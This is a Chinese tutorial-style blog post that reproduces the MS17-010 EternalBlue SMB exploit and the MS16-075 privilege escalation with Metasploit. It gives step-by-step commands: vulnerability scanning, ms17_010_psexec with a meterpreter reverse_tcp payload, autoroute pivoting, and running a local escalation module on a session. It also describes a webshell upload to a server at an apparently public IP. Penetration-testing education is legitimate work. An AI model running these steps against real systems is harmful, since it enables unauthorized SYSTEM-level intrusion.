ms17010復現、ms16-075提權


一、ms17010復現

1、ms17010是什么

Ehernal Blue通過Tcp端口445和139來利用SMBv1和NBT中的遠程代碼執行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只需要開機上網,攻擊者就能獲取system權限,且在電腦和服務器中植入勒索軟件。

 

2、復現

①復現環境

kali     攻擊機     ip:192.168.230.143

windows server 2003 ip:192.168.230.147

ngrok   內網穿透    id:170517247807     ip:vipgz2.idcfengye.com     port:10013  本地:127.0.0.1:8000

windows server2008 R2  ip:119.60.126.9

 

②對服務器win2008進行攻擊

 當我們通過大馬將shell.exe上傳到服務器,並執行獲得msf連接后。可以通過background命令將其放在后台運行,想要再次進入會話時,輸入命令sessions -i id

image.png

image.png

 

因為公網服務器和被攻擊服務器是處於兩個網段,屬於不同的網絡,所以當我們想要訪問被攻擊服務器背后的整個內網時,就要在中間添加路由,搭橋,公網服務器可以將數據傳給被攻擊服務器,從而訪問其后的內網。

image.png

 

image.png

這種情況如果被攻擊服務器2和被攻擊服務器之間能通信,那么只用搭建一條路由,如果他們兩個不能通信,那么還得搭建公網服務器和被攻擊服務器2之間的路由才行(內網流量代理/msf添加路由)

 

 

現在開始添加路由:

run get_local_subnets    獲取當前路由

run autoroute -s 119.90.126.0 -n 255.255.255.0   添加路由

run autoroute -p  查看當前路由

image.png

 

然后把會話掛到后台后,查找主機是否存在ms17-010漏洞 use scanner/smb/smb_ms17_010

設置掃描主機ip ,可以看到當前服務器並不存在ms17-010

image.png

 

③對虛擬機win2003進行攻擊

橋接模式:虛擬機和本機處於同一個級別,都是路由器分配的ip。

nat模式:虛擬機處於本機的子類。 但是他們還是在一個局域網,只是這個局域網是本機發起的。

 

步驟:

use scanner/smb/smb_ms17_010掃描主機是否存在ms17-010

set RHOSTS XXX.XXX.XXX.XXX 設置目標機ip

run

use exploit/windows/smb/ms17_010_psexec (2003 xp 2012)

set payload windows/meterpreter/reverse_tcp

set RHOST XXX.XXX.XXX.XXX 目標機ip

set LHOST XXX.XXX.XXX.XXX 攻擊機ip

run

image.png

image.png

image.png

成功拿到system權限

 

二、ms16-075提權

1、更新kali

由於之前版本太低,msf也不能搜索ms16-075出來,漏洞庫沒有更新,所以升級msf

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall

 

2、使用msf的ms16-075攻擊模塊

我們把當前的shell放在后台,用search ms16-075找他的攻擊模塊,看到有兩個,隨便選一個

image.png

 

這里選的是第二條,use這個模塊

image.png

 

options一下,看看他怎么用的,看樣子要設置session

image.png

 

查看當前有哪些會話,設置一個會話

image.png

 

exploit開始攻擊,可以看到直接就是system權限了

image.png

以上都是在ngrok工作下進行的

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM